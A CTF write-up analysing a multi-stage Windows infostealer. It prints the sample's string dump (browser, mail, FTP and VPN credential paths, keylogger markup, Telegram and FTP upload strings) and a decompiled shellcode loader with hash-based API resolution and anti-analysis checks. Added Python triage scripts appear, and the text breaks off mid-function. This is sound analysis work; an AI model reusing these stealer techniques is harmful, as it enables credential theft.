@nick0ve
Last active November 25, 2021 19:49
ssd black friday challenge writeup by @nick0ve
5yyyy-MM-dd HH:mm:ssyyyy_MM_dd_HH_mm_ss<br><hr>ObjectLengthChainingModeGCMAuthTagLengthChainingModeKeyDataBlobAESMicrosoft Primitive ProviderCONNECTIONKEEP-ALIVEPROXY-AUTHENTICATEPROXY-AUTHORIZATIONTETRAILERTRANSFER-ENCODINGUPGRADE%startupfolder%\%insfolder%\%insname%/\%insfolder%\Software\Microsoft\Windows\CurrentVersion\Run%insregname%SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\RunTrue%GETMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0OKhi_keep_searching\ttYSELECT * FROM Win32_ProcessorName MBUnknownCOCO_-_.zip yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time: MM/dd/yyyy HH:mm:ssUser Name: Computer Name: OSFullName: CPU: RAM: IP Address: New Recovered!User Name: OSFullNameuninstallSoftware\Microsoft\Windows NT\CurrentVersion\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera BrowserOpera Software\Opera StableYandex BrowserYandex\YandexBrowser\User DataIridium BrowserIridium\User DataChromiumChromium\User Data7Star7Star\7Star\User DataTorch BrowserTorch\User DataCool NovoMapleStudio\ChromePlus\User DataKometaKometa\User DataAmigoAmigo\User DataBraveBraveSoftware\Brave-Browser\User DataCentBrowserCentBrowser\User DataChedotChedot\User DataOrbitumOrbitum\User DataSputnikSputnik\Sputnik\User DataComodo DragonComodo\Dragon\User DataVivaldiVivaldi\User DataCitrioCatalinaGroup\Citrio\User Data360 Browser360Chrome\Chrome\User DataUranuCozMedia\Uran\User DataLiebao Browserliebao\User DataElements BrowserElements Browser\User DataEpic PrivacyEpic Privacy Browser\User DataCoccocCocCoc\Browser\User DataSleipnir 6Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewerQIP SurfQIP Surf\User DataCoowonCoowon\Coowon\User DataAPPDATA\CoreFTP\sites.idxHKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\HostHKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesPortUserPWCoreFTPwebpanel,"smtpftpURL: Username: Password: Application: 
URL:Username:Password:Application:[email protected]_p@sssSSD{4g3nt_h3ker}image/jpg:Zone.Identifier\tmpG.tmp%urlkey%-f \Data\Tor\torrcp=%PostURL%127.0.0.1POST+%2Bapplication/x-www-form-urlencoded&&amp;<&lt;>&gt;&quot;Copied Text: <font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">()</font></font>False<font color="#00ba66">{BACK}</font></font><font color="#00ba66">{ALT+TAB}</font><font color="#00ba66">{ALT+F4}</font><font color="#00ba66">{TAB}</font><font color="#00ba66">{ESC}</font><font color="#00ba66">{Win}</font><font color="#00ba66">{CAPSLOCK}</font><font color="#00ba66">&uarr;</font><font color="#00ba66">&darr;</font><font color="#00ba66">&larr;</font><font color="#00ba66">&rarr;</font><font color="#00ba66">{DEL}</font><font color="#00ba66">{END}</font><font color="#00ba66">{HOME}</font><font color="#00ba66">{Insert}</font><font color="#00ba66">{NumLock}</font><font color="#00ba66">{PageDown}</font><font color="#00ba66">{PageUp}</font><font color="#00ba66">{ENTER}</font><font color="#00ba66">{F1}</font><font color="#00ba66">{F2}</font><font color="#00ba66">{F3}</font><font color="#00ba66">{F4}</font><font color="#00ba66">{F5}</font><font color="#00ba66">{F6}</font><font color="#00ba66">{F7}</font><font color="#00ba66">{F8}</font><font color="#00ba66">{F9}</font><font color="#00ba66">{F10}</font><font color="#00ba66">{F11}</font><font color="#00ba66">{F12}</font>control<font color="#00ba66">{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
502
500 Addchat_idcaption/sendDocumentdocument---------------------------x
--
multipart/form-data; boundary=Content-Disposition: form-data; name="{0}"
{1}Content-Disposition: form-data; name="{0}"; filename="{1}"
Content-Type: {2}
--
CookiesOperaChrome\Google\Chrome\User Data\360Chrome\Chrome\User DataYandexSRWare IronBrave Browser\Iridium\User DataCoolNovoEpic Privacy BrowserCocCocQQ BrowserTencent\QQBrowser\User DataUC BrowserUCBrowser\uCozMediacookies.sqliteFirefox\Mozilla\Firefox\IceCat\Mozilla\icecat\PaleMoon\Moonchild Productions\Pale Moon\SeaMonkey\Mozilla\SeaMonkey\Flock\Flock\Browser\K-Meleon\K-Meleon\Postbox\Postbox\Thunderbird\Thunderbird\IceDragon\Comodo\IceDragon\WaterFox\Waterfox\BlackHawk\NETGATE Technologies\BlackHawk\CyberFox\8pecxstudios\Cyberfox\Path=([A-z0-9\/\.\-]+)profiles.ini\Default\Profileorigin_urlusername_valuepassword_valuev10v11Opera Stable\Local State"encrypted_key":"(.*?)"\Default\Login Data\Login Data\Google\Chrome\User Data\loginsMajorMinor2F1A6504-0641-44CF-8BB5-3612D865F2E5Windows Secure Note3CCD5499-87A8-4B10-A215-608888DD3B55Windows Web Password Credential154E23D0-C644-4E6F-8CE6-5069272F999FWindows Credential Picker Protector4BF4C442-9B8A-41A0-B380-DD4A704DDB28Web Credentials77BC582B-F0A6-4E15-4E80-61736B6F3B29Windows CredentialsE69D7838-91B5-4FC9-89D5-230D4D4CC2BCWindows Domain Certificate Credential3E0E35BE-1B77-43E7-B873-AED901B6275BWindows Domain Password Credential3C886FF3-2669-4AA2-A8FB-3F6759A77548Windows Extended Credential00000000-0000-0000-0000-000000000000SchemaIdpResourceElementpIdentityElementpPackageSidpAuthenticatorElementIE/EdgeTypeValue\Common Files\Apple\Apple Application Support\plutil.exe\Apple Computer\Preferences\keychain.plist*Login Datajournalwow_logins\Microsoft\Edge\User DataEdge Chromium\Microsoft\Credentials\\Microsoft\Protect\GuidMasterKey\Default\EncryptedStorage\EncryptedStorageentriescategoryPasswordstr3str2blob0PopPasswordSmtpPasswordSoftware\IncrediMail\Identities\\Accounts_NewEmailAddressSmtpServerincredimailHKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLinecurrentSettingsSavePasswordTextReturnAddressEudora\falkon\profiles\startProfile="([A-z0-9\/\.]+)"\browsedata.dbautofillFalkon 
BrowserstartProfile=([A-z0-9\/\.]+)Backend=([A-z0-9\/\.-]+)\settings.ini\Claws-mail\clawsrcpasskey0master_passphrase_salt=(.+)master_passphrase_pbkdf2_rounds=(.+)use_master_passphrase=(.+)\accountrcsmtp_serveraddressaccount\passwordstorerc{(.*),(.*)}(.*)ClawsMailTransformFinalBlockSubstringIterationCountsignons3.txt---
.
objectsDataDecryptTripleDesFlock BrowserALLUSERSPROFILE\\DynDNS\Updater\config.dyndnsusername==password=&Ht6KzXhChhttp://DynDns.comDynDNS\Psi\profiles\Psi+\profiles\accounts.xmlnamejidpasswordPsi/Psi+Software\OpenVPN-GUI\configsSoftware\OpenVPN-GUI\configs\usernameauth-dataentropyOpen VPNUSERPROFILE\OpenVPN\config\remote \FileZilla\recentservers.xml<Server><Host></Host>:<Port></Port><User></User><Pass encoding="base64"></Pass><Pass>FileZillaSOFTWARE\\Martin Prikryl\\WinSCP 2\\SessionsHostNameUserNamePublicKeyFilePortNumber22[PRIVATE KEY LOCATION: "{0}"]WinSCPUsernameAll Users\FlashFXP\3quick.datIP=port=user=pass=created=FlashFXP\FTP Navigator\Ftplist.txtServerNo PasswordFTP NavigatorProgramfiles(x86)programfiles\jDownloader\config\database.scriptprogramfiles(x86)INSERT INTO CONFIG VALUES('AccountController','sq.txtJDownloaderSoftware\PaltalkHKEY_CURRENT_USER\Software\Paltalk\pwdPaltalk\.purple\accounts.xml<account><protocol></protocol><name></name><password></password>Pidgin\SmartFTP\Client 2.0\Favorites\Quick Connect\\SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml<Password></Password><Name></Name>SmartFTPappdata\Ipswitch\WS_FTP\Sites\ws_ftp.iniHOSTUIDPWDWS_FTPPWD=KeyModeIVPaddingCreateDecryptor\cftp\Ftplist.txt;Server=;Port=;Password=;User=;Anonymous=Name=FTPCommander\FTPGetter\servers.xml<server><server_ip></server_ip><server_port></server_port><server_user_name></server_user_name><server_user_password></server_user_password>FTPGetterHKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUCHKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUCUSERnameNO-IP+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\The Bat!\Account.CFNzzzTheBatHKEY_CURRENT_USER\Software\RimArts\B2\SettingsDataDirFolder.lst\Mailbox.iniAccountSMTPServerMailAddressPassWdBecky!\Trillian\users\global\accounts.datAccountsTrillianSoftware\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging 
Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676EmailIMAP PasswordPOP3 PasswordHTTP PasswordSMTP PasswordSMTP ServerOutlookHKEY_CURRENT_USER\Software\Aerofox\FoxmailPreviewExecutableHKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1FoxmailPath\Storage\\mail\\VirtualStore\Program Files\Foxmail\mail\\VirtualStore\Program Files (x86)\Foxmail\mail\\Accounts\Account.rec0\Account.stgReadDisposePOP3HostSMTPHostIncomingServerPOP3PasswordFoxmail5A71\Opera Mail\Opera Mail\wand.datopera:Opera Mailabcçdefgğhıijklmnoöpqrsştuüvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
\Pocomail\accounts.iniPOPPassSMTPPassSMTPPocoMailRealVNC 4.xSOFTWARE\Wow6432Node\RealVNC\WinVNC4RealVNC 3.xSOFTWARE\RealVNC\vncserverSOFTWARE\RealVNC\WinVNC4Software\ORL\WinVNC3TightVNCSoftware\TightVNC\ServerPasswordViewOnlyTightVNC ControlPasswordControlPasswordTigerVNCSoftware\TigerVNC\ServerTrimUltraVNCProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.inipasswdpasswd2ProgramFiles\UltraVNC\ultravnc.ini
\eM Client.dlleM Client\accounts.dateM ClientAccountConfiguration72905C47-F4FD-4CF7-A489-4E8121A155BDhosto6806642kbM7c5\Mailbird\Store\Store.dbServer_HostEncryptedPasswordMailbirdSenderIdentitiesNordVPNNordVPN directory not found!NordVpn.exe*user.configSelectSingleNode//setting[@name='Username']/valueInnerText//setting[@name='Password']/value\MySQL\Workbench\workbench_user_data.datMySQL Workbench%ProgramW6432%Private Internet Access\data\Private Internet Access\data\account.json.*"username":"(.*?)".*"password":"(.*?)"Private Internet Access<array><dict><string></string><data></data>Safari Browser -convert xml1 -s -o "\fixed_keychain.xml" A10B11C12D13E14F15ABCDEF(EndsWith)IndexOfUNIQUEtableSoftware\DownloadManager\Passwords\EncPasswordInternet Download Manager{0}http://127.0.0.1:HTTP/1.1 Hostname200 Connection established
Proxy-Agent: HToS5x
ConnectPathAndQueryFragment
Host: WrWExtractFilenTorAUTHENTICATE "%torpass%"SIGNAL NEWNYM250torStartInfoFileName\Tor\tor.exeArgumentsUseShellExecuteRedirectStandardOutputCreateNoWindowStartStandardOutputReadLineContainsBootstrapped 100%EndOfStreamIdAvoidDiskWrites 1
Log notice stdout
DormantCanceledByStartup 1
ControlPort 9051
CookieAuthentication 1
runasdaemon 1
ExtORPort auto
hashedcontrolpassword %hash%
DataDirectory %tordir%\Data\Tor
GeoIPFile %tordir%\Data\Tor\geoip
GeoIPv6File %tordir%\Data\Tor\geoip6
\tor.ziphttps://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hash%%torpass%https://www.theonionrouter.com/dist.torproject.org/torbrowser/<a.+?href\s*=\s*(["'])(?<href>.+?)\1[^>]*>hrefReplaceTrimStartTrimEndtor-win32-TransformBlockHash16:Nonewin32_processorprocessorID0c5fb9f4-0b75-4651-9079-499a96a4cb87Win32_NetworkAdapterConfigurationIPEnabledMacAddress24732476-ac02-460e-96bc-0468819d1b49WinMgmts:InstancesOfWin32_BaseBoardSerialNumber322efe8f-8c48-473b-b7d9-4d92e51a6968x200061561Berkelet DB00000002 1.85 (Hash, version 2, native byte-order)Unknow database formatSEQUENCE {{0:X2} INTEGER OCTETSTRING OBJECTIDENTIFIER }sha256key4.dbmetaDataiditem1item2nssPrivatea11a1022a864886f70d02092a864886f70d010c050103key3.dbglobal-saltVersionpassword-checklogins.json\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"[^\u0020-\u007F]signons.sqlitemoz_loginshostnameencryptedUsernameencryptedPasswordVersion=4.0.0.0version=2.0.0.0mscorlibSystemMailClient.Protocols.Smtp.SmtpAccountConfigurationMailClient.Accounts.TlsTypeMailClient.Accounts.CredentialsModelTypesMailClient.Accounts.Mail.MailAccountConfigurationMailClient.Accounts.ArchivingScopeMailClient.Mail.MailAddress;infoAccountConfiguration+accountNameAccountConfiguration+usernameAccountConfiguration+passwordproviderName
int doProcessNameHash(LPCWSTR processName)
{
  ushort uVar1;
  int local_8;

  local_8 = 0x2326;
  while( true ) {
    uVar1 = *processName;
    processName = processName + 1;
    if (uVar1 == 0) break;
    local_8 = local_8 * 0x21 + (uint)uVar1;
  }
  return local_8;
}

undefined4 isProcessRunning(int processNameHash)
{
  int iVar1;
  undefined4 local_244 [9];
  WCHAR local_220 [260];
  code *Process32NextW;
  code *Process32FirstW;
  code *CreateToolhelp32Snapshot;
  int local_c;
  undefined4 local_8;

  local_8 = getKernel32DLL();
  CreateToolhelp32Snapshot = (code *)resolveHash(local_8,0xea31d3b6);
  Process32FirstW = (code *)resolveHash(local_8,0x5c7bf6e9);
  Process32NextW = (code *)resolveHash(local_8,0x873d1860);
  local_c = (*CreateToolhelp32Snapshot)(2,0);
  if (local_c != -1) {
    local_244[0] = 0x22c;
    iVar1 = (*Process32FirstW)(local_c,local_244);
    while (iVar1 != 0) {
      iVar1 = doProcessNameHash(local_220);
      if (iVar1 == processNameHash) {
        return 1;
      }
      iVar1 = (*Process32NextW)(local_c,local_244);
    }
  }
  return 0;
}

void main(undefined4 param_1,LPCWSTR param_2)
{
  undefined4 kernel32DLL;
  HANDLE hFile;
  DWORD bufferSize;
  char *buffer;
  int isOk;
  WCHAR filename [520];
  undefined local_d0 [68];
  undefined local_8c [16];
  undefined4 local_7c;
  undefined4 local_78;
  undefined4 local_74;
  undefined4 processHash1;
  undefined4 processHash2;
  undefined4 processHash3;
  undefined4 processHash4;
  code *CreateProcessW;
  code *GetCommandLineW;
  code *ReadFile;
  undefined4 numberOfBytesRead;
  code *VirtualAlloc;
  code *GetFileSize;
  code *CreateFileW;
  code *GetModuleFileNameW;
  code *ExitProcess;
  code *Sleep;
  char someHash [36];

  numberOfBytesRead = 0;
  someHash[0] = '5';
  someHash[1] = 'd';
  someHash[2] = 'e';
  someHash[3] = '3';
  someHash[4] = '0';
  someHash[5] = 'f';
  someHash[6] = '3';
  someHash[7] = '8';
  someHash[8] = '0';
  someHash[9] = 'd';
  someHash[10] = '8';
  someHash[11] = 'c';
  someHash[12] = '4';
  someHash[13] = '2';
  someHash[14] = '0';
  someHash[15] = '7';
  someHash[16] = 'a';
  someHash[17] = '4';
  someHash[18] = 'c';
  someHash[19] = 'b';
  someHash[20] = '0';
  someHash[21] = '2';
  someHash[22] = '3';
  someHash[23] = 'b';
  someHash[24] = '8';
  someHash[25] = '9';
  someHash[26] = '6';
  someHash[27] = 'b';
  someHash[28] = '0';
  someHash[29] = 'e';
  someHash[30] = '0';
  someHash[31] = 'b';
  someHash[32] = '\0';
  local_74 = 0;
  kernel32DLL = getKernel32DLL();
  Sleep = (code *)resolveHash(kernel32DLL,0x34cf0bf);
  ExitProcess = (code *)resolveHash(kernel32DLL,0x55e38b1f);
  GetModuleFileNameW = (code *)resolveHash(kernel32DLL,0xd1775dc4);
  local_78 = resolveHash(kernel32DLL,0xd6eb2188);
  CreateProcessW = (code *)resolveHash(kernel32DLL,0xa2eae210);
  local_7c = resolveHash(kernel32DLL,0xcd8538b2);
  CreateFileW = (code *)resolveHash(kernel32DLL,0x8a111d91);
  GetFileSize = (code *)resolveHash(kernel32DLL,0x170c1ca1);
  VirtualAlloc = (code *)resolveHash(kernel32DLL,0xa5f15738);
  ReadFile = (code *)resolveHash(kernel32DLL,0x433a3842);
  GetCommandLineW = (code *)resolveHash(kernel32DLL,0x2ffe2c64);
  processHash1 = 0x2d734193;
  processHash2 = 0x63daa681;
  processHash3 = 0x26090612;
  processHash4 = 0x6f28fae0;
  isOk = isProcessRunning(0x2d734193);
  if ((((isOk != 0) || (isOk = isProcessRunning(processHash2), isOk != 0)) ||
      (isOk = isProcessRunning(processHash3), isOk != 0)) ||
     (isOk = isProcessRunning(processHash4), isOk != 0)) {
    (*Sleep)(31000);
  }
  (*GetModuleFileNameW)((HMODULE)0x0,filename,0x103);
  hFile = (*CreateFileW)(param_2,0x80000000,7,(LPSECURITY_ATTRIBUTES)0x0,3,0x80,(HANDLE)0x0);
  if (((hFile != (HANDLE)0xffffffff) &&
      (bufferSize = (*GetFileSize)(hFile,(LPDWORD)0x0), bufferSize != 0xffffffff)) &&
     ((buffer = (char *)(*VirtualAlloc)(0,bufferSize,0x3000,4), buffer != (char *)0x0 &&
      (isOk = (*ReadFile)(hFile,buffer,bufferSize,&numberOfBytesRead,0), isOk != 0)))) {
    decryptBuffer(buffer,someHash,0x20);
    isOk = someAntidebugAndSanityChecks(buffer);
    if (isOk != 0) {
      (*Sleep)(3000);
      memzero(local_8c,0x10);
      memzero(local_d0,0x44);
      kernel32DLL = (*GetCommandLineW)(0,0,0,0x20,0,0,local_d0,local_8c);
      isOk = (*CreateProcessW)(filename,kernel32DLL);
      if (isOk != 0) {
        (*ExitProcess)(0);
      }
    }
    (*ExitProcess)(0);
  }
  return;
}

flag: SSD{4g3nt_h3ker}

Minidump Analysis

Analyzing mspaint.exe.dmp with WinDbg shows that the dump was created inside the Sleep function, called from mspaint.exe+80FC. The function at mspaint.exe+80FC is clearly not part of mspaint; briefly, it:

  • XORs 0xC2E0F bytes starting at 0x409020 with 0x45
  • writes this data to fname = {getenv("temp")}/installer.exe
  • calls system(fname)
  • enters an infinite loop of remove(fname); sleep(1000)

installer.exe analysis

This program writes the following files to a temp folder:

  • Idauud.exe -> the AutoIt interpreter
  • acryprtgh.vsl -> an AutoIt script
  • wfmlrmkokn.idu -> a blob file
  • oon80gy9qs.exe -> a patched copy of Idauud.exe with the following changes:
    • coff_characteristics characteristics = IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE from IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_LARGE_ADDRESS_AWARE | IMAGE_FILE_32BIT_MACHINE
    • pe_dll_characteristics dllCharacteristics = IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE from IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE
    • certificateTableEntry stripped
  • It then executes Idauud.exe acryprtgh.vsl
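As an added example (my code, not the gist author's or the challenge's), here is a small Python check that reads the two header fields and the certificate-table directory entry that the patched copy changes, and diffs an original PE against a patched one. The two headers built by build_pe32() are constructed stand-ins carrying exactly the flag values quoted above; on real samples you would read the original and patched files from disk instead.

```python
import struct

# Bits from the PE specification for the flags the writeup mentions
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_LARGE_ADDRESS_AWARE = 0x0020
IMAGE_FILE_32BIT_MACHINE = 0x0100
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE = 0x8000

FILE_FLAGS = {
    IMAGE_FILE_EXECUTABLE_IMAGE: "IMAGE_FILE_EXECUTABLE_IMAGE",
    IMAGE_FILE_LARGE_ADDRESS_AWARE: "IMAGE_FILE_LARGE_ADDRESS_AWARE",
    IMAGE_FILE_32BIT_MACHINE: "IMAGE_FILE_32BIT_MACHINE",
}
DLL_FLAGS = {
    IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE: "IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE",
    IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE: "IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE",
}


def pe_header_info(buf):
    """Read COFF Characteristics, DllCharacteristics and the certificate table entry."""
    if buf[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4                                   # COFF file header (20 bytes)
    characteristics = struct.unpack_from("<H", buf, coff + 18)[0]
    opt = coff + 20                                       # optional header
    magic = struct.unpack_from("<H", buf, opt)[0]
    dll_characteristics = struct.unpack_from("<H", buf, opt + 70)[0]
    dirs = opt + (96 if magic == 0x10B else 112)          # data directories: PE32 vs PE32+
    cert_va, cert_size = struct.unpack_from("<II", buf, dirs + 4 * 8)  # index 4 = certificate table
    return {"characteristics": characteristics,
            "dll_characteristics": dll_characteristics,
            "certificate_table": (cert_va, cert_size)}


def flag_names(value, table):
    return sorted(name for bit, name in table.items() if value & bit)


def diff_pe_headers(original, patched):
    """Report which flags the patched copy lost and whether its signature was stripped."""
    a, b = pe_header_info(original), pe_header_info(patched)

    def removed(key, table):
        return sorted(set(flag_names(a[key], table)) - set(flag_names(b[key], table)))

    return {
        "file_flags_removed": removed("characteristics", FILE_FLAGS),
        "dll_flags_removed": removed("dll_characteristics", DLL_FLAGS),
        "certificate_stripped": a["certificate_table"] != (0, 0) and b["certificate_table"] == (0, 0),
        # losing DYNAMIC_BASE means the patched binary no longer opts in to ASLR
        "aslr_disabled": bool(a["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
                         and not (b["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
    }


def build_pe32(characteristics, dll_characteristics, cert=(0, 0)):
    """Constructed minimal PE32 header (headers only, no sections) used as sample input."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3A) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    hdr += b"PE\0\0"
    # Machine=i386, 0 sections, no timestamp/symbols, SizeOfOptionalHeader=224
    hdr += struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, characteristics)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<H", opt, 70, dll_characteristics)
    struct.pack_into("<II", opt, 96 + 4 * 8, *cert)       # certificate table directory entry
    return bytes(hdr + opt)


def demo():
    """Original/patched pair with the flag values the writeup quotes for oon80gy9qs.exe."""
    original = build_pe32(
        IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_LARGE_ADDRESS_AWARE | IMAGE_FILE_32BIT_MACHINE,
        IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE,
        cert=(0x1000, 0x200))
    patched = build_pe32(
        IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE,
        IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE)
    return diff_pe_headers(original, patched)


if __name__ == "__main__":
    print(demo())
```

The same diff applied to a dropped interpreter and its vendor build is a cheap triage signal: a copy of a legitimate tool with DYNAMIC_BASE cleared and the Authenticode directory zeroed is worth flagging even before the accompanying script is looked at.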

acryprtgh.vsl analysis

Writes shellcode into $X35cqbeuflb and executes it through a VirtualAlloc + DllCallAddress chain.

Shellcode analysis

It can be reversed with the help of a debugger and the Ghidra script ssd-ghidra-hash-resolver.py.

You can find the partially recovered source code of the shellcode in this gist.

Briefly this shellcode:

  • Checks the list of running processes for blacklisted names by comparing name hashes; if one is present, it sleeps for 31000 milliseconds:
    processHash1 = 0x2d734193;
    processHash2 = 0x63daa681;
    processHash3 = 0x26090612;
    processHash4 = 0x6f28fae0;
    isOk = isProcessRunning(0x2d734193);
    if ((((isOk != 0) || (isOk = isProcessRunning(processHash2), isOk != 0)) ||
        (isOk = isProcessRunning(processHash3), isOk != 0)) ||
       (isOk = isProcessRunning(processHash4), isOk != 0)) {
      (*Sleep)(31000);
    }
  • Opens, reads and decrypts the file wfmlrmkokn.idu (key = 5de30f380d8c4207a4cb023b896b0e0b) with the function decryptBuffer located at .base+0x128b. The decrypted result is a PE file.
  • In the end it does some weird checks in the function @.text+0x027a and probably executes the decrypted buffer, since it is a PE. I didn't reverse the shellcode any further at this point.
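To make the hash resolution concrete, here is an added Python example (mine, not the author's Ghidra script or the shellcode) that reimplements the hash used by doProcessNameHash() and resolveHash() above (seed 0x2326, multiply by 0x21 per character, 32-bit wrap, the same function the gist's name_hash() implements) and looks the API hash constants from the decompiled code up in a candidate list of kernel32 export names. The candidate list and the BLACKLIST_HASHES set are taken from the decompiled code on this page; which process names the four blacklist hashes correspond to is not established here, so resolve() simply returns None for them.

```python
# Hash parameters read straight out of doProcessNameHash(): local_8 = 0x2326; local_8 = local_8*0x21 + c
HASH_SEED = 0x2326   # 8998 in the Ghidra script
HASH_MULT = 0x21     # 33 in the Ghidra script
MASK32 = (1 << 32) - 1


def api_hash(name):
    """Hash a name the way the shellcode does. The shellcode walks UTF-16 code units
    (LPCWSTR), which for ASCII names is the same sequence of values as ord() gives."""
    h = HASH_SEED
    for ch in name:
        h = (h * HASH_MULT + ord(ch)) & MASK32
    return h


# kernel32 exports that the decompiled shellcode resolves by hash
KERNEL32_NAMES = [
    "CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW",
    "Sleep", "ExitProcess", "GetModuleFileNameW", "CreateProcessW",
    "CreateFileW", "GetFileSize", "VirtualAlloc", "ReadFile", "GetCommandLineW",
]


def build_table(names):
    """Precompute hash -> name, which is what the Ghidra script does over the
    FunctionDefinition names in the windows_vs12_32 archive."""
    return {api_hash(n): n for n in names}


def resolve(h, table=None):
    """Return the export name for a hash constant, or None if no candidate matches."""
    table = build_table(KERNEL32_NAMES) if table is None else table
    return table.get(h)


# The four constants compared against running-process name hashes in main()
BLACKLIST_HASHES = {0x2d734193, 0x63daa681, 0x26090612, 0x6f28fae0}


def is_blacklisted(process_name):
    """Mimic the comparison in isProcessRunning() for one szExeFile value
    (the check is case-sensitive, since the hash is computed over raw code units)."""
    return api_hash(process_name) in BLACKLIST_HASHES


def find_blacklisted(candidates):
    """Detection-side helper: which names in a candidate list would trip the sleep branch."""
    return [n for n in candidates if is_blacklisted(n)]


if __name__ == "__main__":
    for h in (0x34cf0bf, 0x433a3842, 0xea31d3b6, 0x2d734193):
        print("%#010x -> %s" % (h, resolve(h)))
```

Running the script against the constants in the decompiled main() reproduces the labels the author gave them (for instance 0x34cf0bf resolves to Sleep and 0x433a3842 to ReadFile); feeding find_blacklisted() a list of process names from your own analysis VM tells you whether that environment would trigger the 31-second stall.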

Decrypted wfmlrmkokn.idu analysis

I didn't reverse it in depth; I just noticed that the main function does something with the resources. Opening the file in PEview, it is easy to spot that one resource is a PE file @file+0x11458. I extracted this PE with this script:

# Read the decrypted wfmlrmkokn.idu (saved here as another_pe.exe)
with open('./another_pe.exe', 'rb') as f:
    x = f.read()

# Slice out the embedded PE resource that PEview showed at file offset 0x11458
stage5 = x[0x11458:0x47448+0x10]
print(len(stage5))
print(len(x[0x11458:]))

with open('last.exe', 'wb') as f:
    f.write(stage5)

Last PE analysis, finally the onion is unveiled

The last PE is an obfuscated .NET binary. Opening it in dnSpy, I spotted that a big array is constructed and decrypted in static A49AA8D2-8915-4BE8-ACA2-15CECAABE69C() (the type's static constructor):

	A49AA8D2-8915-4BE8-ACA2-15CECAABE69C.<<EMPTY_NAME>> = new byte[]
	{
		159, 210, 209, 208, 215, 130, 225, 224, 143, 199,
		196, 129, 238, 239, 158, 200, 215, 129, 203, 202,
		199, 198, 197, 196, 237, 254, 253, 238, 210, 211,
 ...

	for (int i = 0; i < A49AA8D2-8915-4BE8-ACA2-15CECAABE69C.<<EMPTY_NAME>>.Length; i++)
	{
		A49AA8D2-8915-4BE8-ACA2-15CECAABE69C.<<EMPTY_NAME>>[i] = (byte)((int)A49AA8D2-8915-4BE8-ACA2-15CECAABE69C.<<EMPTY_NAME>>[i] ^ i ^ 170);
	}

Applying the decryption in Python yields the file last.extracted; grepping it for the flag gives [email protected]_p@sssSSD{4g3nt_h3ker}, so the flag should be SSD{4g3nt_h3ker}.
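The decoding steps in this writeup are all simple XORs around a PE carve, so here is one added Python example (my code, not the author's) that reproduces three of them end to end on a constructed buffer: the mspaint dropper's single-byte XOR with 0x45, the carve of an embedded PE with an MZ/PE signature check, and the .NET static constructor's byte ^ i ^ 170. The fake PE and container produced by build_fake_pe() and build_fake_dropper() are constructed stand-ins, not the challenge files; the offsets 0x409020/0xC2E0F and 0x11458 from the text would replace the constructed ones when running this on the real samples.

```python
import struct

STAGE1_KEY = 0x45   # single-byte XOR key used by the mspaint dropper
STAGE6_KEY = 170    # constant in the .NET static constructor: b ^ i ^ 170


def xor_single(buf, key):
    """Stage-1 style decode: every byte XORed with one constant key."""
    return bytes(b ^ key for b in buf)


def xor_index(buf, key=STAGE6_KEY):
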